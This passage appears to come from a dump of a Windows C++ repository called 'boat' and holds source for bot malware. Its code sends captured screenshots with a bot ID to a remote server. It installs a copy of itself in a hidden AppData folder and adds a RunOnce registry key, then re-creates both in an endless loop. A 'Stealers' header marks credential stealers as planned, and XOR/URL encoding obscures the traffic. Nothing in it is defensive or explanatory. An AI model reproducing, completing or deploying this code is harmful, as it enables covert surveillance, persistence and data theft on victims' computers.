unsigned short port, char* data, int dataLength, char* botId) { 123 | sockaddr_in input; 124 | if (!GetSocketAddress(destination, &input)) return false; 125 | input.sin_port = htons(port); 126 | SOCKET s; 127 | 128 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 129 | if (s == 0) return false; 130 | 131 | int cRes = connect(s, (sockaddr*)&input, sizeof(input)); 132 | if (cRes == SOCKET_ERROR) { 133 | closesocket(s); return false; 134 | } 135 | 136 | send(s, botId, strlen(botId), 0); 137 | 138 | char* buffer = (char*)malloc(32); 139 | ZeroMemory(buffer, 32); 140 | int len = recv(s, buffer, 32, 0); 141 | 142 | if (strcmp(buffer, "ACCEPT\\1") == 0) { 143 | send(s, data, dataLength, 0); 144 | } 145 | else { 146 | closesocket(s); 147 | return false; 148 | } 149 | len = recv(s, buffer, 32, 0); 150 | 151 | free(buffer); 152 | closesocket(s); 153 | 154 | return true; 155 | } -------------------------------------------------------------------------------- /boat/Screenshot.h: -------------------------------------------------------------------------------- 1 | #ifndef SCREENSHOT_H 2 | #define SCREENSHOT_H 3 | 4 | char* CaptureScreenshot(int* length); 5 | bool SendScreenshot(char* destination, unsigned short port, char* data, int dataLength, char* botId); 6 | void FreeScreenshot(char*); 7 | 8 | #endif -------------------------------------------------------------------------------- /boat/SocketInit.cpp: -------------------------------------------------------------------------------- 1 | #include "Sockets.h" 2 | #include "SocketInit.h" 3 | 4 | bool SocketStartup() 5 | { 6 | WORD wVersionRequested; 7 | WSADATA wsaData; 8 | int err; 9 | 10 | wVersionRequested = MAKEWORD(2, 2); 11 | 12 | err = WSAStartup(wVersionRequested, &wsaData); 13 | if (err != 0) return false; 14 | 15 | if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) { 16 | WSACleanup(); 17 | return false; 18 | } 19 | else 20 | return true; 21 | } 22 | 23 | void SocketCleanup() 24 | { 25 | WSACleanup(); 26 | } -------------------------------------------------------------------------------- /boat/SocketInit.h: -------------------------------------------------------------------------------- 1 | #ifndef SOCKETINIT_H 2 | #define SOCKETINIT_H 3 | 4 | bool SocketStartup(); 5 | void SocketCleanup(); 6 | 7 | #endif -------------------------------------------------------------------------------- /boat/Sockets.cpp: -------------------------------------------------------------------------------- 1 | #include "Sockets.h" 2 | 3 | bool GetSocketAddress(char* host, sockaddr_in* address) 4 | { 5 | struct addrinfo* result = NULL; 6 | struct addrinfo* ptr = NULL; 7 | struct addrinfo hints; 8 | 9 | ZeroMemory(&hints, sizeof(hints)); 10 | hints.ai_family = AF_INET; 11 | hints.ai_socktype = SOCK_STREAM; 12 | hints.ai_protocol = IPPROTO_TCP; 13 | 14 | if (getaddrinfo(host, "http", &hints, &result)) return false; 15 | 16 | *address = *(sockaddr_in*)(result[0].ai_addr); 17 | freeaddrinfo(result); 18 | return true; 19 | } -------------------------------------------------------------------------------- /boat/Sockets.h: -------------------------------------------------------------------------------- 1 | #ifndef SOCKETS_H 2 | #define SOCKETS_H 3 | 4 | #pragma comment(lib, "ws2_32.lib") 5 | #include 6 | #include 7 | 8 | bool GetSocketAddress(char* host, sockaddr_in* address); 9 | 10 | #endif -------------------------------------------------------------------------------- /boat/Startup.cpp: -------------------------------------------------------------------------------- 1 | #include "Startup.h" 2 | // Forward declarations not present in header 3 | BOOL WriteBufferToDisk(LPWSTR wStrFilePath, LPBYTE ptrBuffer, DWORD dwSizeofBuffer, DWORD dwFileAttributes); 4 | BOOL MakeDirectory(LPWSTR wStrDirectoryPath, DWORD dwFolderAttributes); 5 | BOOL CreateRegKey(LPWSTR wStrRegKeyName, LPWSTR wStrRegKeyValue); 6 | LPWSTR GetAppDataLocation(); 7 | LPWSTR ConcatenateInstallFolder(LPWSTR wStrInstallFolder); 8 | LPWSTR ConcatenateInstallFile(LPWSTR wStrConcatenatedFolder, LPWSTR wStrFileName); 9 | 10 | BOOL WriteBufferToDisk(LPWSTR wStrFilePath, LPBYTE ptrBuffer, DWORD dwSizeofBuffer, DWORD dwFileAttributes) { 11 | 12 | BOOL bSuccess = FALSE; 13 | 14 | // Create new file, even if already exists 15 | HANDLE hFile = CreateFileW(wStrFilePath, GENERIC_READ | GENERIC_WRITE, NULL, NULL, CREATE_ALWAYS, NULL, NULL); 16 | if (!hFile) { 17 | return bSuccess; 18 | } 19 | 20 | // Write buffer to new file 21 | DWORD dwWritten = 0; 22 | if (WriteFile(hFile, ptrBuffer, dwSizeofBuffer, &dwWritten, NULL)) { 23 | if (dwWritten != dwSizeofBuffer) { 24 | CloseHandle(hFile); 25 | return bSuccess; 26 | } 27 | } 28 | 29 | // Close handle 30 | CloseHandle(hFile); 31 | 32 | // Set Attributes 33 | if (dwFileAttributes) { 34 | if (!SetFileAttributesW(wStrFilePath, dwFileAttributes)) { 35 | return bSuccess; 36 | } 37 | } 38 | 39 | return (bSuccess = TRUE); 40 | } 41 | 42 | LPWSTR GetAppDataLocation() { 43 | 44 | LPWSTR wStrPath = (LPWSTR)malloc(MAX_PATH); 45 | 46 | if (SUCCEEDED(SHGetFolderPathW(NULL, CSIDL_APPDATA, NULL, NULL, wStrPath))) { 47 | return wStrPath; 48 | } 49 | 50 | return NULL; 51 | } 52 | 53 | LPWSTR ConcatenateInstallFolder(LPWSTR wStrInstallFolder) { 54 | 55 | LPWSTR wStrAppData = GetAppDataLocation(); 56 | if (!wStrAppData) { 57 | return NULL; 58 | } 59 | 60 | LPWSTR wStrReturnValue = NULL; 61 | wStrReturnValue = lstrcatW(wStrAppData, L"\\"); 62 | wStrReturnValue = lstrcatW(wStrReturnValue, wStrInstallFolder); 63 | 64 | if (wStrReturnValue) { 65 | return wStrReturnValue; 66 | } 67 | 68 | return NULL; 69 | } 70 | 71 | LPWSTR ConcatenateInstallFile(LPWSTR wStrConcatenatedFolder, LPWSTR wStrFileName) { 72 | 73 | LPWSTR wStrAppData = GetAppDataLocation(); 74 | if (!wStrAppData) { 75 | return NULL; 76 | } 77 | 78 | LPWSTR wStrReturnValue = NULL; 79 | wStrReturnValue = lstrcatW(wStrConcatenatedFolder, L"\\"); 80 | wStrReturnValue = lstrcatW(wStrReturnValue, wStrFileName); 81 | 82 | if (wStrReturnValue) { 83 | return wStrReturnValue; 84 | } 85 | 86 | return NULL; 87 | } 88 | 89 | BOOL MakeDirectory(LPWSTR wStrDirectoryPath, DWORD dwFolderAttributes) { 90 | 91 | BOOL bSuccess = FALSE; 92 | 93 | if (PathFileExistsW(wStrDirectoryPath)) { 94 | return (bSuccess = TRUE); 95 | } 96 | 97 | if (CreateDirectoryW(wStrDirectoryPath, NULL)) { 98 | if (dwFolderAttributes) { 99 | SetFileAttributesW(wStrDirectoryPath, dwFolderAttributes); 100 | return (bSuccess = TRUE); 101 | } 102 | } 103 | 104 | return bSuccess; 105 | } 106 | 107 | BOOL CreateRegKey(LPWSTR wStrRegKeyName, LPWSTR wStrRegKeyValue) { 108 | 109 | BOOL bSuccess = FALSE; 110 | HKEY hKey = NULL; 111 | 112 | // Open RunOnce registry hive 113 | LSTATUS lRegStatus = RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", NULL, KEY_ALL_ACCESS, &hKey); 114 | if (lRegStatus != ERROR_SUCCESS) { 115 | return bSuccess; 116 | } 117 | 118 | // Check if our value is already present 119 | LPBYTE ptrRegBuffer = NULL; 120 | DWORD dwSizeofRegBuffer = NULL; 121 | lRegStatus = RegQueryValueExW(hKey, wStrRegKeyName, NULL, NULL, ptrRegBuffer, &dwSizeofRegBuffer); 122 | 123 | if (!ptrRegBuffer) { 124 | // If not, we must set the value 125 | lRegStatus = RegSetValueExW(hKey, wStrRegKeyName, NULL, REG_SZ, (LPBYTE)wStrRegKeyValue, lstrlenW(wStrRegKeyValue) * sizeof(WCHAR)); 126 | if (lRegStatus == ERROR_SUCCESS) { 127 | RegCloseKey(hKey); 128 | return (bSuccess = TRUE); 129 | } 130 | } 131 | else { 132 | // If our key is already present close key and return true 133 | if (lstrcmpW((LPWSTR)ptrRegBuffer, wStrRegKeyValue) == 0) { 134 | RegCloseKey(hKey); 135 | return (bSuccess = TRUE); 136 | } 137 | } 138 | } 139 | 140 | BOOL DoInitialInstallation(PINSTALLATION_INFO ptrInfo, 141 | OUT LPBYTE* ptrExecutableBuffer, 142 | OUT LPWSTR* wPtrStrFolder, 143 | OUT LPWSTR* wPtrStrFile, 144 | OUT PDWORD dwPtrBufferSize) { 145 | 146 | BOOL bSuccess = FALSE; 147 | 148 | // FIXTHIS : Correctly map PE into buffer totally in-memory 149 | 150 | /* 151 | // Get current imagebase 152 | HMODULE hCurrentModule = GetModuleHandleW(NULL); 153 | if (!hCurrentModule) { 154 | return bSuccess; 155 | } 156 | 157 | // Read PE from imagebase 158 | PIMAGE_DOS_HEADER pIDH = (PIMAGE_DOS_HEADER)hCurrentModule; 159 | if (pIDH->e_magic != IMAGE_DOS_SIGNATURE) { 160 | return bSuccess; 161 | } 162 | 163 | PIMAGE_NT_HEADERS pINH = (PIMAGE_NT_HEADERS)((DWORD)hCurrentModule + pIDH->e_lfanew); 164 | if (pINH->Signature != IMAGE_NT_SIGNATURE) { 165 | return bSuccess; 166 | } 167 | 168 | // Read current PE size 169 | DWORD dwExeSize = pINH->OptionalHeader.SizeOfImage; 170 | 171 | // Allocate a buffer to copy the current PE into 172 | LPBYTE ptrExeBuffer = (LPBYTE)malloc(dwExeSize + 1); 173 | if (!ptrExeBuffer) { 174 | return bSuccess; 175 | } 176 | 177 | */ 178 | 179 | // Temporary 180 | // get a physical handle to self instead of in-memory one 181 | WCHAR lpszSfxPath[MAX_PATH]; 182 | GetModuleFileNameW(NULL, lpszSfxPath, MAX_PATH); 183 | HANDLE hFile = CreateFileW(lpszSfxPath, 184 | GENERIC_READ, 185 | FILE_SHARE_READ, 186 | NULL, 187 | OPEN_EXISTING, 188 | FILE_ATTRIBUTE_NORMAL, 189 | NULL); 190 | 191 | DWORD dwExeSize = GetFileSize(hFile, NULL); 192 | LPVOID fileData = HeapAlloc(GetProcessHeap(), 0, dwExeSize); 193 | if (!ReadFile(hFile, fileData, dwExeSize, NULL, NULL)) // fill buffer 194 | { 195 | return bSuccess; 196 | } 197 | 198 | // initiate vacant buffer 199 | LPBYTE ptrExeBuffer = (LPBYTE)malloc(dwExeSize + 1); 200 | if (!ptrExeBuffer) { 201 | return bSuccess; 202 | } 203 | 204 | // Copy current PE into buffer 205 | memcpy_s(ptrExeBuffer, dwExeSize, fileData, dwExeSize); 206 | 207 | 208 | // Concatenate folder name 209 | LPWSTR wStrConcatenatedFolder = ConcatenateInstallFolder(ptrInfo->wStrFolderName); 210 | if (!wStrConcatenatedFolder) { 211 | free(ptrExeBuffer); 212 | return bSuccess; 213 | } 214 | 215 | // Create intallation folder 216 | if (!MakeDirectory(wStrConcatenatedFolder, ptrInfo->dwInstallationAttributes)) { 217 | free(ptrExeBuffer); 218 | return bSuccess; 219 | } 220 | 221 | // Concatenate file name 222 | LPWSTR wStrInstallationPath = ConcatenateInstallFile(wStrConcatenatedFolder, ptrInfo->wStrFileName); 223 | if (!wStrInstallationPath) { 224 | free(ptrExeBuffer); 225 | return bSuccess; 226 | } 227 | 228 | // Write file to disk 229 | if (!WriteBufferToDisk(wStrInstallationPath, ptrExeBuffer, dwExeSize, ptrInfo->dwInstallationAttributes)) { 230 | free(ptrExeBuffer); 231 | return bSuccess; 232 | } 233 | 234 | // Create registry key 235 | if (!CreateRegKey(ptrInfo->wStrRegKeyName, wStrInstallationPath)) { 236 | free(ptrExeBuffer); 237 | return bSuccess; 238 | } 239 | 240 | // Assign OUT params 241 | *ptrExecutableBuffer = ptrExeBuffer; 242 | 243 | *wPtrStrFolder = (LPWSTR)malloc(MAX_PATH); 244 | RtlSecureZeroMemory(*wPtrStrFolder, MAX_PATH); 245 | 246 | *wPtrStrFile = (LPWSTR)malloc(MAX_PATH); 247 | RtlSecureZeroMemory(*wPtrStrFile, MAX_PATH); 248 | 249 | memcpy(*wPtrStrFile, wStrInstallationPath, lstrlenW(wStrInstallationPath) * sizeof(WCHAR)); 250 | PathRemoveFileSpecW(wStrInstallationPath); 251 | memcpy(*wPtrStrFolder, wStrInstallationPath, lstrlen(wStrInstallationPath)* sizeof(WCHAR)); 252 | 253 | *dwPtrBufferSize = dwExeSize; 254 | 255 | return (bSuccess = TRUE); 256 | } 257 | 258 | VOID RunStartupRoutine(LPVOID lpParam) { 259 | 260 | if (!lpParam) { 261 | return; 262 | } 263 | 264 | PINSTALLATION_INFO ptrInstallInfo = (PINSTALLATION_INFO)lpParam; 265 | 266 | LPBYTE ptrExeBuffer = NULL; 267 | LPWSTR ptrStrFolder = NULL; 268 | LPWSTR ptrStrFile = NULL; 269 | DWORD dwSizeofBuffer = NULL; 270 | 271 | DoInitialInstallation(ptrInstallInfo, &ptrExeBuffer, &ptrStrFolder, &ptrStrFile, &dwSizeofBuffer); 272 | 273 | while (TRUE) { 274 | 275 | if (!PathFileExistsW(ptrStrFolder)) { 276 | MakeDirectory(ptrStrFolder, ptrInstallInfo->dwInstallationAttributes); 277 | WriteBufferToDisk(ptrStrFile, ptrExeBuffer, dwSizeofBuffer, ptrInstallInfo->dwInstallationAttributes); 278 | } 279 | 280 | if (PathFileExistsW(ptrStrFolder) && !PathFileExistsW(ptrStrFile)) { 281 | WriteBufferToDisk(ptrStrFile, ptrExeBuffer, dwSizeofBuffer, ptrInstallInfo->dwInstallationAttributes); 282 | } 283 | 284 | CreateRegKey(ptrInstallInfo->wStrRegKeyName, ptrStrFile); 285 | } 286 | } 287 | -------------------------------------------------------------------------------- /boat/Startup.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include 6 | #include 7 | 8 | // Link dependencies 9 | #pragma comment(lib, "shlwapi.lib") 10 | 11 | typedef struct _INSTALLATION_INFO { 12 | 13 | LPWSTR wStrFileName; 14 | LPWSTR wStrFolderName; 15 | LPWSTR wStrRegKeyName; 16 | 17 | DWORD dwInstallationAttributes; 18 | 19 | } INSTALLATION_INFO, *PINSTALLATION_INFO; 20 | 21 | /// Should be called using CreateThread. Will install the PE from the current imagebase. 22 | /// Parameter takes a pointer to an initialized INSTALLATION_INFO structure. 23 | /// 24 | VOID RunStartupRoutine(LPVOID lpParam); -------------------------------------------------------------------------------- /boat/Stealers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // to be implimented soon 4 | -------------------------------------------------------------------------------- /boat/StringOperations.cpp: -------------------------------------------------------------------------------- 1 | #include "StringOperations.h" 2 | 3 | char** SplitString(char* string, char* delimiter, int* numElements, bool ignoreEmpty) 4 | { 5 | int nDelimiterLen = strlen(delimiter); 6 | int nStringLen = strlen(string); 7 | int nDelimMatch = 0; 8 | *numElements = 0; 9 | 10 | if (nDelimiterLen == 0 || nDelimiterLen >= nStringLen) 11 | return (char**)NULL; 12 | 13 | char* initial = string; 14 | char** buffer = (char**)malloc(((nStringLen / nDelimiterLen) + 1) * sizeof(char*)); 15 | ZeroMemory(buffer, ((nStringLen / nDelimiterLen) + 1) * sizeof(char*)); 16 | 17 | for (int i = 0; i < nStringLen; i++) 18 | { 19 | if (string[i] == delimiter[nDelimMatch]) 20 | nDelimMatch++; 21 | else { 22 | nDelimMatch = 0; 23 | if (string[i] == delimiter[nDelimMatch]) 24 | nDelimMatch++; 25 | } 26 | 27 | if (nDelimMatch == nDelimiterLen) 28 | { 29 | nDelimMatch = 0; 30 | 31 | char* data = initial; 32 | int dataLength = string + i - initial + 1 - nDelimiterLen; 33 | initial = string + i + 1; 34 | 35 | if (dataLength == 0 && ignoreEmpty) 36 | continue; 37 | 38 | buffer[*numElements] = (char*)malloc(dataLength + 1); 39 | if(dataLength) memcpy_s(buffer[*numElements], dataLength, data, dataLength); 40 | buffer[*numElements][dataLength] = '\0'; 41 | *numElements = *numElements + 1; 42 | } 43 | 44 | if (i == nStringLen - 1) 45 | { 46 | char* data = initial; 47 | int dataLength = string + i - initial + 1; 48 | 49 | if (dataLength == 0 && ignoreEmpty) 50 | continue; 51 | 52 | buffer[*numElements] = (char*)malloc(dataLength + 1); 53 | if (dataLength) memcpy_s(buffer[*numElements], dataLength, data, dataLength); 54 | buffer[*numElements][dataLength] = '\0'; 55 | *numElements = *numElements + 1; 56 | } 57 | } 58 | 59 | return buffer; 60 | } 61 | 62 | void FreeSplitStringBuffer(char** buffer, int numElements) 63 | { 64 | for (int i = 0; i < numElements; i++) 65 | { 66 | free(buffer[i]); 67 | } 68 | 69 | free(buffer); 70 | } 71 | 72 | char* JoinString(char** strings, int numElements, int* outputLength) { 73 | int size = 0; 74 | for (int i = 0; i < numElements; i++) 75 | size += strlen(strings[i]); 76 | 77 | char* finalBuffer = (char*)malloc(size + 1); 78 | finalBuffer[size] = 0; 79 | 80 | for (int i = 0, index = 0; i < numElements; i++) { 81 | memcpy_s(finalBuffer + index, size - index, strings[i], strlen(strings[i])); 82 | index += strlen(strings[i]); 83 | } 84 | 85 | *outputLength = size; 86 | return finalBuffer; 87 | } 88 | 89 | void FreeJoinStringBuffer(char* buffer) { 90 | free(buffer); 91 | } -------------------------------------------------------------------------------- /boat/StringOperations.h: -------------------------------------------------------------------------------- 1 | #ifndef STRINGOPERATIONS_H 2 | #define STRINGOPERATIONS_H 3 | 4 | #include 5 | #include 6 | 7 | char** SplitString(char* string, char* delimiter, int* numElements, bool ignoreEmpty = true); 8 | void FreeSplitStringBuffer(char** buffer, int numElements); 9 | 10 | char* JoinString(char** strings, int numElements, int* outputLength); 11 | void FreeJoinStringBuffer(char* buffer); 12 | #endif -------------------------------------------------------------------------------- /boat/URLEncoding.cpp: -------------------------------------------------------------------------------- 1 | #include "URLEncoding.h" 2 | #include 3 | 4 | static char* hexTable = "0123456789ABCDEF"; 5 | 6 | char* URLEncode(char* input, int length) 7 | { 8 | int nInputLen = length; 9 | int nOutputLen = nInputLen * 3; 10 | 11 | char* output = (char*)malloc(nOutputLen + 1); 12 | char* retOutput = output; 13 | output[nOutputLen] = '\0'; 14 | 15 | for (int i = 0; i < nInputLen; i++) 16 | { 17 | *output++ = '%'; 18 | *output++ = hexTable[(input[i] & 0xF0) >> 4]; 19 | *output++ = hexTable[(input[i] & 0x0F)]; 20 | } 21 | 22 | return retOutput; 23 | } 24 | 25 | char* URLDecode(char* input, int* outputLength) 26 | { 27 | int nInputLen = strlen(input); 28 | if ((nInputLen % 3) != 0) 29 | return NULL; 30 | int nOutputLen = nInputLen / 3; 31 | *outputLength = nOutputLen; 32 | char* output = (char*)malloc(nOutputLen + 1); 33 | output[nOutputLen] = '\0'; 34 | 35 | char* workingInput = input; 36 | char* retOutput = output; 37 | 38 | for (int i = 0; i < nOutputLen; i++) 39 | { 40 | workingInput++; // dispose of '%' 41 | char charValue = 0; 42 | char working = *workingInput++; 43 | char actual; 44 | for (actual = 0; actual < 16; actual++) 45 | { 46 | if (hexTable[actual] == working) 47 | break; 48 | } 49 | charValue += (actual << 4); 50 | working = *workingInput++; 51 | for (actual = 0; actual < 16; actual++) 52 | { 53 | if (hexTable[actual] == working) 54 | break; 55 | } 56 | charValue += actual; 57 | *output++ = charValue; 58 | } 59 | 60 | return retOutput; 61 | } 62 | 63 | void FreeURLEncodeResult(char* input) 64 | { 65 | free(input); 66 | } 67 | 68 | void FreeURLDecodeResult(char* input) 69 | { 70 | free(input); 71 | } -------------------------------------------------------------------------------- /boat/URLEncoding.h: -------------------------------------------------------------------------------- 1 | #ifndef URLENCODING_H 2 | #define URLENCODING_H 3 | 4 | char* URLEncode(char* input, int length); 5 | char* URLDecode(char* input, int* outputLength); 6 | 7 | void FreeURLEncodeResult(char* input); 8 | void FreeURLDecodeResult(char* input); 9 | 10 | #endif -------------------------------------------------------------------------------- /boat/WebSafeEncryption.cpp: -------------------------------------------------------------------------------- 1 | #include "WebSafeEncryption.h" 2 | #include "URLEncoding.h" 3 | #include 4 | 5 | char* GetEncodedXorResult(char* input, char* key, int inputLength, int keyLength, char** outputKey) 6 | { 7 | char* xoredInput = XORInputKey(input, key, inputLength, keyLength); 8 | char* encoded = URLEncode(xoredInput, inputLength); 9 | *outputKey = URLEncode(key, keyLength); 10 | FreeXORResult(xoredInput); 11 | return encoded; 12 | } 13 | 14 | char* GetDecodedXorResult(char* input, char* key, int* outputLength) 15 | { 16 | int inputLength, keyLength; 17 | char* decodedKey = URLDecode(key, &keyLength); 18 | char* decodedInput = URLDecode(input, &inputLength); 19 | 20 | char* output = XORInputKey(decodedInput, decodedKey, inputLength, keyLength); 21 | FreeURLDecodeResult(decodedInput); 22 | FreeURLDecodeResult(decodedKey); 23 | 24 | *outputLength = inputLength; 25 | 26 | return output; 27 | } 28 | 29 | void FreeEncodedXorResult(char* input, char* key) 30 | { 31 | FreeURLEncodeResult(input); 32 | FreeURLEncodeResult(key); 33 | } 34 | 35 | void FreeDecodedXorResult(char* input) 36 | { 37 | FreeXORResult(input); 38 | } -------------------------------------------------------------------------------- /boat/WebSafeEncryption.h: -------------------------------------------------------------------------------- 1 | #ifndef WEBSAFEENCRYPTION_H 2 | #define WEBSAFEENCRYPTION_H 3 | 4 | #include "xor.h" 5 | 6 | char* GetEncodedXorResult(char* input, char* key, int inputLength, int keyLength, char** outputKey); 7 | char* GetDecodedXorResult(char* input, char* key, int* outputLength); 8 | void FreeEncodedXorResult(char* input, char* key); 9 | void FreeDecodedXorResult(char* input); 10 | 11 | 12 | #endif -------------------------------------------------------------------------------- /boat/WebsiteChecker.cpp: -------------------------------------------------------------------------------- 1 | #include "HttpQuery.h" 2 | #include "StringOperations.h" 3 | #include "WebsiteChecker.h" 4 | 5 | bool CheckIfWebsiteIsUp(char* url) 6 | { 7 | char* host; 8 | char* path; 9 | bool res = URLToHostPath(url, &host, &path); 10 | if (!res) return false; 11 | 12 | res = CheckIfWebsiteIsUp(host, path); 13 | 14 | FreeHostPathResult(host, path); 15 | 16 | return res; 17 | } 18 | 19 | bool CheckIfWebsiteIsUp(char* host, char* path) 20 | { 21 | char* data; 22 | NameValuePair** headers; 23 | int length; 24 | int result = HTTPQuery(host, path, NULL, &headers, &data, &length); 25 | FreeHTTPResponse(headers, data); 26 | 27 | return (result == 200); 28 | } 29 | 30 | bool URLToHostPath(char* url, char** host, char** path) 31 | { 32 | int length1; 33 | char** result1 = SplitString(url, "://", &length1); 34 | 35 | if (length1 > 2 || strcmp(result1[0], "http")) //ensure it is not a https url 36 | { 37 | FreeSplitStringBuffer(result1, length1); 38 | return false; 39 | } 40 | 41 | int length2; 42 | char** result2 = SplitString(result1[length1 - 1], "/" , &length2, false); 43 | 44 | FreeSplitStringBuffer(result1, length1); 45 | 46 | int length = 0; 47 | int index = 0; 48 | 49 | for (int i = 1; i < length2; i++) 50 | length += strlen(result2[i]) + 1; 51 | 52 | if (!length) length = 1; 53 | 54 | char* retHost = (char*)malloc(strlen(result2[0]) + 1); 55 | char* retPath = (char*)malloc(length + 1); 56 | 57 | retHost[strlen(result2[0])] = '\0'; 58 | retPath[length] = '\0'; 59 | 60 | //8====D 61 | 62 | memcpy_s(retHost, strlen(result2[0]), result2[0], strlen(result2[0])); 63 | 64 | for (int i = 1; i < length2; i++) 65 | { 66 | retPath[index] = '/'; 67 | index += 1; 68 | if(strlen(result2[i])) memcpy_s(retPath + index, length - index, result2[i], strlen(result2[i])); 69 | index += strlen(result2[i]); 70 | } 71 | 72 | if (!index) 73 | retPath[0] = '/'; 74 | 75 | FreeSplitStringBuffer(result2, length2); 76 | 77 | *host = retHost; 78 | *path = retPath; 79 | 80 | return true; 81 | } 82 | 83 | void FreeHostPathResult(char* host, char* path) 84 | { 85 | free(host); 86 | free(path); 87 | } -------------------------------------------------------------------------------- /boat/WebsiteChecker.h: -------------------------------------------------------------------------------- 1 | #ifndef WEBSITECHECKER_H 2 | #define WEBSITECHECKER_H 3 | 4 | bool CheckIfWebsiteIsUp(char* url); 5 | bool CheckIfWebsiteIsUp(char* host, char* path); 6 | bool URLToHostPath(char* url, char** host, char** path); 7 | void FreeHostPathResult(char* host, char* path); 8 | 9 | #endif -------------------------------------------------------------------------------- /boat/boat.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.23107.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "boat", "boat\boat.vcxproj", "{4684ADB7-B57B-48A3-9213-C9020918C703}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Debug|x64.ActiveCfg = Debug|x64 17 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Debug|x64.Build.0 = Debug|x64 18 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Debug|x86.ActiveCfg = Debug|Win32 19 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Debug|x86.Build.0 = Debug|Win32 20 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Release|x64.ActiveCfg = Release|x64 21 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Release|x64.Build.0 = Release|x64 22 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Release|x86.ActiveCfg = Release|Win32 23 | {4684ADB7-B57B-48A3-9213-C9020918C703}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /boat/boat.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | DontConnect 10 | x64 11 | 12 | 13 | ReleaseDontConnect 14 | x64 15 | 16 | 17 | Release 18 | Win32 19 | 20 | 21 | Debug 22 | x64 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {4684ADB7-B57B-48A3-9213-C9020918C703} 31 | Win32Proj 32 | boat 33 | 8.1 34 | 35 | 36 | 37 | Application 38 | true 39 | v140_xp 40 | Unicode 41 | 42 | 43 | Application 44 | false 45 | v140_xp 46 | true 47 | Unicode 48 | 49 | 50 | Application 51 | true 52 | v140 53 | Unicode 54 | 55 | 56 | Application 57 | false 58 | v140 59 | true 60 | Unicode 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | false 82 | 83 | 84 | true 85 | 86 | 87 | false 88 | false 89 | false 90 | 91 | 92 | false 93 | 94 | 95 | 96 | 97 | 98 | Level3 99 | Disabled 100 | WIN32;_CRT_SECURE_NO_WARNINGS;_CRT_SECURE_NO_WARNINGS_GLOBALS;%(PreprocessorDefinitions) 101 | true 102 | 103 | 104 | 105 | 106 | Windows 107 | true 108 | 109 | 110 | 111 | 112 | 113 | 114 | Level3 115 | Disabled 116 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 117 | true 118 | 119 | 120 | Console 121 | true 122 | 123 | 124 | 125 | 126 | Level3 127 | 128 | 129 | MinSpace 130 | true 131 | true 132 | WIN32;_CRT_SECURE_NO_WARNINGS;_CRT_SECURE_NO_WARNINGS_GLOBALS;%(PreprocessorDefinitions) 133 | false 134 | MultiThreaded 135 | Size 136 | 137 | 138 | Windows 139 | No 140 | true 141 | true 142 | 143 | 144 | false 145 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib 146 | 147 | 148 | 149 | 150 | 151 | 152 | false 153 | 154 | 155 | 156 | 157 | Level3 158 | 159 | 160 | MaxSpeed 161 | true 162 | true 163 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 164 | true 165 | 166 | 167 | Console 168 | true 169 | true 170 | true 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | -------------------------------------------------------------------------------- /boat/boat.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {5532dc48-b030-4c66-b337-c42ea18d160f} 18 | 19 | 20 | {07f5494a-46f4-48b5-9734-b844d44704f5} 21 | 22 | 23 | {8d065270-bc1d-4fdf-b16d-974d3773658a} 24 | 25 | 26 | {758a2194-598f-4ecb-9884-45cfac99b9e4} 27 | 28 | 29 | {a3424cc0-5ea3-439d-9d07-e235f54af1a6} 30 | 31 | 32 | {590f3090-c258-4d2d-8b92-d0a0984afda4} 33 | 34 | 35 | 